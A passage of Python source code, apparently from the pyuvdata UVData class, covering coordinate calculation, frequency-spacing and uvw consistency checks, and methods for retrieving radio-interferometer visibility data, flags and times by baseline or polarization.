pm_ra=pm_ra,
pm_dec=pm_dec,
vrad=vrad,
dist=dist,
time_array=self.time_array[select_mask],
lst_array=self.lst_array[select_mask],
telescope_loc=self.telescope_location_lat_lon_alt,
coord_type=cat_type,
)
else:
# So this is actually the easier of the two cases -- just use the object
# properties to fill in the relevant data
app_ra, app_dec = uvutils.calc_app_coords(
self.phase_center_ra,
self.phase_center_dec,
self.phase_center_frame,
coord_epoch=self.phase_center_epoch,
time_array=self.time_array,
lst_array=self.lst_array,
telescope_loc=self.telescope_location_lat_lon_alt,
coord_type="sidereal",
)
# Now that we have the apparent coordinates sorted out, we can figure out what
# it is we want to do with the position angle
frame_pa = uvutils.calc_frame_pos_angle(
self.time_array,
app_ra,
app_dec,
self.telescope_location_lat_lon_alt,
self.phase_center_frame,
ref_epoch=self.phase_center_epoch,
)
self.phase_center_app_ra = app_ra
self.phase_center_app_dec = app_dec
self.phase_center_frame_pa = frame_pa
def set_lsts_from_time_array(self, background=False):
"""Set the lst_array based from the time_array.
Parameters
----------
background : bool, False
When set to True, start the calculation on a threading.Thread in the
background and return the thread to the user.
Returns
-------
proc : None or threading.Thread instance
When background is set to True, a thread is returned which must be
joined before the lst_array exists on the UVData object.
"""
if not background:
self._set_lsts_helper()
return
else:
proc = threading.Thread(target=self._set_lsts_helper)
proc.start()
return proc
def _check_flex_spw_contiguous(self):
"""
Check if the spectral windows are contiguous for flex_spw datasets.
This checks the flex_spw_id_array to make sure that all channels for each
spectral window are together in one block, versus being interspersed (e.g.,
        channels #1 and #3 are in spw #1, channels #2 and #4 are in spw #2). In theory,
UVH5 and UVData objects can handle this, but MIRIAD, MIR, UVFITS, and MS file
formats cannot, so we just consider it forbidden.
"""
if self.flex_spw:
exp_spw_ids = np.unique(self.spw_array)
# This is an internal consistency check to make sure that the indexes match
# up as expected -- this shouldn't error unless someone is mucking with
# settings they shouldn't be.
assert np.all(np.unique(self.flex_spw_id_array) == exp_spw_ids)
n_breaks = np.sum(self.flex_spw_id_array[1:] != self.flex_spw_id_array[:-1])
if (n_breaks + 1) != self.Nspws:
raise ValueError(
"Channels from different spectral windows are interspersed with "
"one another, rather than being grouped together along the "
"frequency axis. Most file formats do not support such "
"non-grouping of data."
)
else:
# If this isn't a flex_spw data set, then there is only 1 spectral window,
# which means that the check always passes
pass
return True
def _check_freq_spacing(self, raise_errors=True):
"""
Check if frequencies are evenly spaced and separated by their channel width.
This is a requirement for writing uvfits & miriad files.
Parameters
----------
raise_errors : bool
Option to raise errors if the various checks do not pass.
Returns
-------
spacing_error : bool
Flag that channel spacings or channel widths are not equal.
chanwidth_error : bool
Flag that channel spacing does not match channel width.
"""
spacing_error = False
chanwidth_error = False
if self.future_array_shapes:
freq_spacing = np.diff(self.freq_array)
freq_array_use = self.freq_array
else:
freq_spacing = np.diff(self.freq_array[0])
freq_array_use = self.freq_array[0]
if self.Nfreqs == 1:
# Skip all of this if there is only 1 channel
pass
elif self.flex_spw:
            # Check to make sure that the flexible spectral window has indices set up
# correctly (grouped together) for this check
self._check_flex_spw_contiguous()
diff_chanwidth = np.diff(self.channel_width)
freq_dir = []
# We want to grab unique spw IDs, in the order that they appear in the data
select_mask = np.append((np.diff(self.flex_spw_id_array) != 0), True)
for idx in self.flex_spw_id_array[select_mask]:
chan_mask = self.flex_spw_id_array == idx
freq_dir += [
np.sign(np.mean(np.diff(freq_array_use[chan_mask])))
] * np.sum(chan_mask)
# Pop off the first entry, since the above arrays are diff'd
# (and thus one element shorter)
freq_dir = np.array(freq_dir[1:])
# Ignore cases where looking at the boundaries of spectral windows
bypass_check = self.flex_spw_id_array[1:] != self.flex_spw_id_array[:-1]
if not np.all(
np.logical_or(
bypass_check,
np.isclose(
diff_chanwidth,
0.0,
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
),
)
):
spacing_error = True
if not np.all(
np.logical_or(
bypass_check,
np.isclose(
freq_spacing,
self.channel_width[1:] * freq_dir,
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
),
)
):
chanwidth_error = True
else:
freq_dir = np.sign(np.mean(freq_spacing))
if not np.isclose(
np.min(freq_spacing),
np.max(freq_spacing),
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
):
spacing_error = True
if self.future_array_shapes:
if not np.isclose(
np.min(self.channel_width),
np.max(self.channel_width),
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
):
spacing_error = True
else:
if not np.isclose(
np.mean(freq_spacing),
np.mean(self.channel_width) * freq_dir,
rtol=self._channel_width.tols[0],
atol=self._channel_width.tols[1],
):
chanwidth_error = True
else:
if not np.isclose(
np.mean(freq_spacing),
self.channel_width * freq_dir,
rtol=self._channel_width.tols[0],
atol=self._channel_width.tols[1],
):
chanwidth_error = True
if raise_errors and spacing_error:
raise ValueError(
"The frequencies are not evenly spaced (probably "
"because of a select operation) or has differing "
"values of channel widths. Some file formats "
"(e.g. uvfits, miriad) and methods (frequency_average) "
"do not support unevenly spaced frequencies."
)
if raise_errors and chanwidth_error:
raise ValueError(
"The frequencies are separated by more than their "
"channel width (probably because of a select operation). "
"Some file formats (e.g. uvfits, miriad) and "
"methods (frequency_average) do not support "
"frequencies that are spaced by more than their "
"channel width."
)
return spacing_error, chanwidth_error
def _calc_nants_data(self):
"""Calculate the number of antennas from ant_1_array and ant_2_array arrays."""
return int(np.union1d(self.ant_1_array, self.ant_2_array).size)
def check(
self,
check_extra=True,
run_check_acceptability=True,
check_freq_spacing=False,
strict_uvw_antpos_check=False,
allow_flip_conj=False,
):
"""
Add some extra checks on top of checks on UVBase class.
Check that required parameters exist. Check that parameters have
appropriate shapes and optionally that the values are acceptable.
Parameters
----------
check_extra : bool
If true, check all parameters, otherwise only check required parameters.
run_check_acceptability : bool
Option to check if values in parameters are acceptable.
check_freq_spacing : bool
Option to check if frequencies are evenly spaced and the spacing is
equal to their channel_width. This is not required for UVData
objects in general but is required to write to uvfits and miriad files.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
allow_flip_conj : bool
If set to True, and the UVW coordinates do not match antenna positions,
check and see if flipping the conjugation of the baselines (i.e, multiplying
the UVWs by -1) resolves the apparent discrepancy -- and if it does, fix
the apparent conjugation error in `uvw_array` and `data_array`. Default is
False.
Returns
-------
bool
True if check passes
Raises
------
ValueError
if parameter shapes or types are wrong or do not have acceptable
values (if run_check_acceptability is True)
"""
# first run the basic check from UVBase
# set the phase type based on object's value
if self.phase_type == "phased":
self._set_phased()
elif self.phase_type == "drift":
self._set_drift()
else:
raise ValueError('Phase type must be either "phased" or "drift"')
super(UVData, self).check(
check_extra=check_extra, run_check_acceptability=run_check_acceptability
)
# Check internal consistency of numbers which don't explicitly correspond
# to the shape of another array.
if self.Nants_data != self._calc_nants_data():
raise ValueError(
"Nants_data must be equal to the number of unique "
"values in ant_1_array and ant_2_array"
)
if self.Nbls != len(np.unique(self.baseline_array)):
raise ValueError(
"Nbls must be equal to the number of unique "
"baselines in the data_array"
)
if self.Ntimes != len(np.unique(self.time_array)):
raise ValueError(
"Ntimes must be equal to the number of unique "
"times in the time_array"
)
# require that all entries in ant_1_array and ant_2_array exist in
# antenna_numbers
if not set(np.unique(self.ant_1_array)).issubset(self.antenna_numbers):
raise ValueError("All antennas in ant_1_array must be in antenna_numbers.")
if not set(np.unique(self.ant_2_array)).issubset(self.antenna_numbers):
raise ValueError("All antennas in ant_2_array must be in antenna_numbers.")
# issue warning if extra_keywords keys are longer than 8 characters
for key in self.extra_keywords.keys():
if len(key) > 8:
warnings.warn(
"key {key} in extra_keywords is longer than 8 "
"characters. It will be truncated to 8 if written "
"to uvfits or miriad file formats.".format(key=key)
)
# issue warning if extra_keywords values are lists, arrays or dicts
for key, value in self.extra_keywords.items():
if isinstance(value, (list, dict, np.ndarray)):
warnings.warn(
"{key} in extra_keywords is a list, array or dict, "
"which will raise an error when writing uvfits or "
"miriad file types".format(key=key)
)
if run_check_acceptability:
# check that the uvws make sense given the antenna positions
# make a metadata only copy of this object to properly calculate uvws
temp_obj = self.copy(metadata_only=True)
if temp_obj.phase_center_frame is not None:
output_phase_frame = temp_obj.phase_center_frame
else:
output_phase_frame = "icrs"
with warnings.catch_warnings():
warnings.simplefilter("ignore")
temp_obj.set_uvws_from_antenna_positions(
allow_phasing=True, output_phase_frame=output_phase_frame,
)
if not np.allclose(temp_obj.uvw_array, self.uvw_array, atol=1):
max_diff = np.max(np.abs(temp_obj.uvw_array - self.uvw_array))
if allow_flip_conj and np.allclose(
-temp_obj.uvw_array, self.uvw_array, atol=1
):
warnings.warn(
"UVW orientation appears to be flipped, attempting to "
"fix by changing conjugation of baselines."
)
self.uvw_array *= -1
self.data_array = np.conj(self.data_array)
elif not strict_uvw_antpos_check:
warnings.warn(
"The uvw_array does not match the expected values given "
"the antenna positions. The largest discrepancy is "
f"{max_diff} meters. This is a fairly common situation "
"but might indicate an error in the antenna positions, "
"the uvws or the phasing."
)
else:
raise ValueError(
"The uvw_array does not match the expected values given "
"the antenna positions. The largest discrepancy is "
f"{max_diff} meters."
)
# check auto and cross-corrs have sensible uvws
autos = np.isclose(self.ant_1_array - self.ant_2_array, 0.0)
if not np.all(
np.isclose(
self.uvw_array[autos],
0.0,
rtol=self._uvw_array.tols[0],
atol=self._uvw_array.tols[1],
)
):
raise ValueError(
"Some auto-correlations have non-zero uvw_array coordinates."
)
if np.any(
np.isclose(
# this line used to use np.linalg.norm but it turns out
# squaring and sqrt is slightly more efficient unless the array
# is "very large".
np.sqrt(
self.uvw_array[~autos, 0] ** 2
+ self.uvw_array[~autos, 1] ** 2
+ self.uvw_array[~autos, 2] ** 2
),
0.0,
rtol=self._uvw_array.tols[0],
atol=self._uvw_array.tols[1],
)
):
raise ValueError(
"Some cross-correlations have near-zero uvw_array magnitudes."
)
if check_freq_spacing:
self._check_freq_spacing()
return True
def copy(self, metadata_only=False):
"""
Make and return a copy of the UVData object.
Parameters
----------
metadata_only : bool
If True, only copy the metadata of the object.
Returns
-------
UVData
Copy of self.
"""
if not metadata_only:
return super(UVData, self).copy()
else:
uv = UVData()
# include all attributes, not just UVParameter ones.
for attr in self.__iter__(uvparams_only=False):
# skip properties
if isinstance(getattr(type(self), attr, None), property):
continue
# skip data like parameters
# parameter names have a leading underscore we want to ignore
if attr.lstrip("_") in self._data_params:
continue
setattr(uv, attr, copy.deepcopy(getattr(self, attr)))
if uv.future_array_shapes:
for param_name in uv._data_params:
getattr(uv, "_" + param_name).form = ("Nblts", "Nfreqs", "Npols")
return uv
def baseline_to_antnums(self, baseline):
"""
Get the antenna numbers corresponding to a given baseline number.
Parameters
----------
baseline : int or array_like of int
baseline number
Returns
-------
int or array_like of int
first antenna number(s)
int or array_like of int
second antenna number(s)
"""
return uvutils.baseline_to_antnums(baseline, self.Nants_telescope)
def antnums_to_baseline(self, ant1, ant2, attempt256=False):
"""
Get the baseline number corresponding to two given antenna numbers.
Parameters
----------
ant1 : int or array_like of int
first antenna number
ant2 : int or array_like of int
second antenna number
attempt256 : bool
Option to try to use the older 256 standard used in many uvfits files
(will use 2048 standard if there are more than 256 antennas).
Returns
-------
int or array of int
baseline number corresponding to the two antenna numbers.
"""
return uvutils.antnums_to_baseline(
ant1, ant2, self.Nants_telescope, attempt256=attempt256
)
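    # Example (illustrative sketch, not executed): baseline_to_antnums and
    # antnums_to_baseline are inverses of each other for a given object `uvd`:
    #
    #     ant1, ant2 = uvd.baseline_to_antnums(uvd.baseline_array[0])
    #     assert uvd.antnums_to_baseline(ant1, ant2) == uvd.baseline_array[0]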
def antpair2ind(self, ant1, ant2=None, ordered=True):
"""
Get indices along the baseline-time axis for a given antenna pair.
This will search for either the key as specified, or the key and its
conjugate.
Parameters
----------
ant1, ant2 : int
Either an antenna-pair key, or key expanded as arguments,
e.g. antpair2ind( (10, 20) ) or antpair2ind(10, 20)
ordered : bool
If True, search for antpair as provided, else search for it and
its conjugate.
Returns
-------
        inds : ndarray of int64
indices of the antpair along the baseline-time axis.
"""
# check for expanded antpair or key
if ant2 is None:
if not isinstance(ant1, tuple):
raise ValueError(
"antpair2ind must be fed an antpair tuple "
"or expand it as arguments"
)
ant2 = ant1[1]
ant1 = ant1[0]
else:
if not isinstance(ant1, (int, np.integer)):
raise ValueError(
"antpair2ind must be fed an antpair tuple or "
"expand it as arguments"
)
if not isinstance(ordered, (bool, np.bool_)):
raise ValueError("ordered must be a boolean")
# if getting auto-corr, ordered must be True
if ant1 == ant2:
ordered = True
# get indices
inds = np.where((self.ant_1_array == ant1) & (self.ant_2_array == ant2))[0]
if ordered:
return inds
else:
ind2 = np.where((self.ant_1_array == ant2) & (self.ant_2_array == ant1))[0]
inds = np.asarray(np.append(inds, ind2), dtype=np.int64)
return inds
def _key2inds(self, key):
"""
Interpret user specified key as antenna pair and/or polarization.
Parameters
----------
key : tuple of int
Identifier of data. Key can be length 1, 2, or 3:
if len(key) == 1:
if (key < 5) or (type(key) is str): interpreted as a
polarization number/name, return all blts for that pol.
else: interpreted as a baseline number. Return all times and
polarizations for that baseline.
if len(key) == 2: interpreted as an antenna pair. Return all
times and pols for that baseline.
if len(key) == 3: interpreted as antenna pair and pol (ant1, ant2, pol).
Return all times for that baseline, pol. pol may be a string.
Returns
-------
blt_ind1 : ndarray of int
blt indices for antenna pair.
blt_ind2 : ndarray of int
blt indices for conjugate antenna pair.
Note if a cross-pol baseline is requested, the polarization will
also be reversed so the appropriate correlations are returned.
e.g. asking for (1, 2, 'xy') may return conj(2, 1, 'yx'), which
            is equivalent to the requested baseline. See utils.conj_pol() for
complete conjugation mapping.
pol_ind : tuple of ndarray of int
polarization indices for blt_ind1 and blt_ind2
"""
key = uvutils._get_iterable(key)
if type(key) is str:
# Single string given, assume it is polarization
pol_ind1 = np.where(
self.polarization_array
== uvutils.polstr2num(key, x_orientation=self.x_orientation)
)[0]
if len(pol_ind1) > 0:
blt_ind1 = np.arange(self.Nblts, dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
else:
raise KeyError("Polarization {pol} not found in data.".format(pol=key))
elif len(key) == 1:
key = key[0] # For simplicity
if isinstance(key, Iterable):
# Nested tuple. Call function again.
blt_ind1, blt_ind2, pol_ind = self._key2inds(key)
elif key < 5:
# Small number, assume it is a polarization number a la AIPS memo
pol_ind1 = np.where(self.polarization_array == key)[0]
if len(pol_ind1) > 0:
blt_ind1 = np.arange(self.Nblts)
blt_ind2 = np.array([], dtype=np.int64)
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
else:
raise KeyError(
"Polarization {pol} not found in data.".format(pol=key)
)
else:
# Larger number, assume it is a baseline number
inv_bl = self.antnums_to_baseline(
self.baseline_to_antnums(key)[1], self.baseline_to_antnums(key)[0]
)
blt_ind1 = np.where(self.baseline_array == key)[0]
blt_ind2 = np.where(self.baseline_array == inv_bl)[0]
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError("Baseline {bl} not found in data.".format(bl=key))
if len(blt_ind1) > 0:
pol_ind1 = np.arange(self.Npols)
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
try:
pol_ind2 = uvutils.reorder_conj_pols(self.polarization_array)
except ValueError:
if len(blt_ind1) == 0:
raise KeyError(
f"Baseline {key} not found for polarization "
"array in data."
)
else:
pol_ind2 = np.array([], dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
elif len(key) == 2:
# Key is an antenna pair
blt_ind1 = self.antpair2ind(key[0], key[1])
blt_ind2 = self.antpair2ind(key[1], key[0])
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError("Antenna pair {pair} not found in data".format(pair=key))
if len(blt_ind1) > 0:
pol_ind1 = np.arange(self.Npols)
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
try:
pol_ind2 = uvutils.reorder_conj_pols(self.polarization_array)
except ValueError:
if len(blt_ind1) == 0:
raise KeyError(
f"Baseline {key} not found for polarization array in data."
)
else:
pol_ind2 = np.array([], dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
elif len(key) == 3:
# Key is an antenna pair + pol
blt_ind1 = self.antpair2ind(key[0], key[1])
blt_ind2 = self.antpair2ind(key[1], key[0])
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError(
"Antenna pair {pair} not found in "
"data".format(pair=(key[0], key[1]))
)
if type(key[2]) is str:
# pol is str
if len(blt_ind1) > 0:
pol_ind1 = np.where(
self.polarization_array
== uvutils.polstr2num(key[2], x_orientation=self.x_orientation)
)[0]
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
pol_ind2 = np.where(
self.polarization_array
== uvutils.polstr2num(
uvutils.conj_pol(key[2]), x_orientation=self.x_orientation
)
)[0]
else:
pol_ind2 = np.array([], dtype=np.int64)
else:
# polarization number a la AIPS memo
if len(blt_ind1) > 0:
pol_ind1 = np.where(self.polarization_array == key[2])[0]
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
pol_ind2 = np.where(
self.polarization_array == uvutils.conj_pol(key[2])
)[0]
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
if len(blt_ind1) * len(pol_ind[0]) + len(blt_ind2) * len(pol_ind[1]) == 0:
raise KeyError(
"Polarization {pol} not found in data.".format(pol=key[2])
)
# Catch autos
if np.array_equal(blt_ind1, blt_ind2):
blt_ind2 = np.array([], dtype=np.int64)
return (blt_ind1, blt_ind2, pol_ind)
def _smart_slicing(
self, data, ind1, ind2, indp, squeeze="default", force_copy=False
):
"""
Quickly get the relevant section of a data-like array.
Used in get_data, get_flags and get_nsamples.
Parameters
----------
data : ndarray
4-dimensional array shaped like self.data_array
ind1 : array_like of int
blt indices for antenna pair (e.g. from self._key2inds)
ind2 : array_like of int
blt indices for conjugate antenna pair. (e.g. from self._key2inds)
        indp : tuple of array_like of int
polarization indices for ind1 and ind2 (e.g. from self._key2inds)
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of data
"""
p_reg_spaced = [False, False]
p_start = [0, 0]
p_stop = [0, 0]
dp = [1, 1]
for i, pi in enumerate(indp):
if len(pi) == 0:
continue
if len(set(np.ediff1d(pi))) <= 1:
p_reg_spaced[i] = True
p_start[i] = pi[0]
p_stop[i] = pi[-1] + 1
if len(pi) != 1:
dp[i] = pi[1] - pi[0]
if len(ind2) == 0:
# only unconjugated baselines
if len(set(np.ediff1d(ind1))) <= 1:
blt_start = ind1[0]
blt_stop = ind1[-1] + 1
if len(ind1) == 1:
dblt = 1
else:
dblt = ind1[1] - ind1[0]
if p_reg_spaced[0]:
if self.future_array_shapes:
out = data[
blt_start:blt_stop:dblt, :, p_start[0] : p_stop[0] : dp[0]
]
else:
out = data[
blt_start:blt_stop:dblt,
:,
:,
p_start[0] : p_stop[0] : dp[0],
]
else:
if self.future_array_shapes:
out = data[blt_start:blt_stop:dblt, :, indp[0]]
else:
out = data[blt_start:blt_stop:dblt, :, :, indp[0]]
else:
out = data[ind1]
if p_reg_spaced[0]:
if self.future_array_shapes:
out = out[:, :, p_start[0] : p_stop[0] : dp[0]]
else:
out = out[:, :, :, p_start[0] : p_stop[0] : dp[0]]
else:
if self.future_array_shapes:
out = out[:, :, indp[0]]
else:
out = out[:, :, :, indp[0]]
elif len(ind1) == 0:
# only conjugated baselines
if len(set(np.ediff1d(ind2))) <= 1:
blt_start = ind2[0]
blt_stop = ind2[-1] + 1
if len(ind2) == 1:
dblt = 1
else:
dblt = ind2[1] - ind2[0]
if p_reg_spaced[1]:
if self.future_array_shapes:
out = np.conj(
data[
blt_start:blt_stop:dblt,
:,
p_start[1] : p_stop[1] : dp[1],
]
)
else:
out = np.conj(
data[
blt_start:blt_stop:dblt,
:,
:,
p_start[1] : p_stop[1] : dp[1],
]
)
else:
if self.future_array_shapes:
out = np.conj(data[blt_start:blt_stop:dblt, :, indp[1]])
else:
out = np.conj(data[blt_start:blt_stop:dblt, :, :, indp[1]])
else:
out = data[ind2]
if p_reg_spaced[1]:
if self.future_array_shapes:
out = np.conj(out[:, :, p_start[1] : p_stop[1] : dp[1]])
else:
out = np.conj(out[:, :, :, p_start[1] : p_stop[1] : dp[1]])
else:
if self.future_array_shapes:
out = np.conj(out[:, :, indp[1]])
else:
out = np.conj(out[:, :, :, indp[1]])
else:
# both conjugated and unconjugated baselines
out = (data[ind1], np.conj(data[ind2]))
if p_reg_spaced[0] and p_reg_spaced[1]:
if self.future_array_shapes:
out = np.append(
out[0][:, :, p_start[0] : p_stop[0] : dp[0]],
out[1][:, :, p_start[1] : p_stop[1] : dp[1]],
axis=0,
)
else:
out = np.append(
out[0][:, :, :, p_start[0] : p_stop[0] : dp[0]],
out[1][:, :, :, p_start[1] : p_stop[1] : dp[1]],
axis=0,
)
else:
if self.future_array_shapes:
out = np.append(
out[0][:, :, indp[0]], out[1][:, :, indp[1]], axis=0
)
else:
out = np.append(
out[0][:, :, :, indp[0]], out[1][:, :, :, indp[1]], axis=0
)
if squeeze == "full":
out = np.squeeze(out)
elif squeeze == "default":
if self.future_array_shapes:
if out.shape[2] == 1:
# one polarization dimension
out = np.squeeze(out, axis=2)
else:
if out.shape[3] == 1:
# one polarization dimension
out = np.squeeze(out, axis=3)
if out.shape[1] == 1:
# one spw dimension
out = np.squeeze(out, axis=1)
elif squeeze != "none":
raise ValueError(
'"' + str(squeeze) + '" is not a valid option for squeeze.'
'Only "default", "none", or "full" are allowed.'
)
if force_copy:
out = np.array(out)
elif out.base is not None:
# if out is a view rather than a copy, make it read-only
out.flags.writeable = False
return out
def get_ants(self):
"""
Get the unique antennas that have data associated with them.
Returns
-------
ndarray of int
Array of unique antennas with data associated with them.
"""
return np.unique(np.append(self.ant_1_array, self.ant_2_array))
def get_baseline_nums(self):
"""
Get the unique baselines that have data associated with them.
Returns
-------
ndarray of int
Array of unique baselines with data associated with them.
"""
return np.unique(self.baseline_array)
def get_antpairs(self):
"""
Get the unique antpair tuples that have data associated with them.
Returns
-------
list of tuples of int
list of unique antpair tuples (ant1, ant2) with data associated with them.
"""
return list(zip(*self.baseline_to_antnums(self.get_baseline_nums())))
def get_pols(self):
"""
Get the polarizations in the data.
Returns
-------
list of str
list of polarizations (as strings) in the data.
"""
return uvutils.polnum2str(
self.polarization_array, x_orientation=self.x_orientation
)
def get_antpairpols(self):
"""
Get the unique antpair + pol tuples that have data associated with them.
Returns
-------
list of tuples of int
list of unique antpair + pol tuples (ant1, ant2, pol) with data
associated with them.
"""
pols = self.get_pols()
bls = self.get_antpairs()
return [(bl) + (pol,) for bl in bls for pol in pols]
def get_feedpols(self):
"""
Get the unique antenna feed polarizations in the data.
Returns
-------
list of str
list of antenna feed polarizations (e.g. ['X', 'Y']) in the data.
Raises
------
ValueError
If any pseudo-Stokes visibilities are present
"""
if np.any(self.polarization_array > 0):
raise ValueError(
"Pseudo-Stokes visibilities cannot be interpreted as feed polarizations"
)
else:
return list(set("".join(self.get_pols())))
def get_data(self, key1, key2=None, key3=None, squeeze="default", force_copy=False):
"""
        Get the data corresponding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all data for
that pol.
else:
interpreted as a baseline number, get all data for that baseline.
if key is length 2: interpreted as an antenna pair, get all data
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all data for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of data.
If data exists conjugate to requested antenna pair, it will be conjugated
before returning.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
out = self._smart_slicing(
self.data_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
)
return out
def get_flags(
self, key1, key2=None, key3=None, squeeze="default", force_copy=False
):
"""
        Get the flags corresponding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all flags for
that pol.
else:
interpreted as a baseline number, get all flags for that baseline.
if key is length 2: interpreted as an antenna pair, get all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all flags for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of flags.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
# When we select conjugated baselines, there is a call to np.conj()
# inside of _smart_slicing to correct the data array. This has the
# unintended consequence of promoting the dtype of an array of np.bool_
# to np.int8. Rather than having a bunch of special handling for this
# ~corner case, we instead explicitly cast back to np.bool_ before we
# hand back to the user.
out = self._smart_slicing(
self.flag_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
).astype(np.bool_)
return out
def get_nsamples(
self, key1, key2=None, key3=None, squeeze="default", force_copy=False
):
"""
        Get the nsamples corresponding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all nsamples for
that pol.
else:
interpreted as a baseline number, get all nsamples for that
baseline.
if key is length 2: interpreted as an antenna pair, get all nsamples
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all nsamples for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of
nsample_array.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
out = self._smart_slicing(
self.nsample_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
)
return out
def get_times(self, key1, key2=None, key3=None):
"""
Get the times for a given antpair or baseline number.
Meant to be used in conjunction with get_data function.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all times.
else:
interpreted as a baseline number, get all times for that baseline.
if key is length 2: interpreted as an antenna pair, get all times
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all times for that baseline.
Returns
-------
ndarray
times from the time_array for the given antpair or baseline.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
inds1, inds2, indp = self._key2inds(key)
return self.time_array[np.append(inds1, inds2)]
def get_lsts(self, key1, key2=None, key3=None):
"""
Get the LSTs for a given antpair or baseline number.
Meant to be used in conjunction with get_data function.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all times.
else:
interpreted as a baseline number, get all times for that baseline.
if key is length 2: interpreted as an antenna pair, get all times
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all times for that baseline.
Returns
-------
ndarray
LSTs from the lst_array for the given antpair or baseline.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
inds1, inds2, indp = self._key2inds(key)
return self.lst_array[np.append(inds1, inds2)]
def get_ENU_antpos(self, center=False, pick_data_ants=False):
"""
Get antenna positions in ENU (topocentric) coordinates in units of meters.
Parameters
----------
center : bool
If True, subtract median of array position from antpos
pick_data_ants : bool
If True, return only antennas found in data
Returns
-------
antpos : ndarray
Antenna positions in ENU (topocentric) coordinates in units of
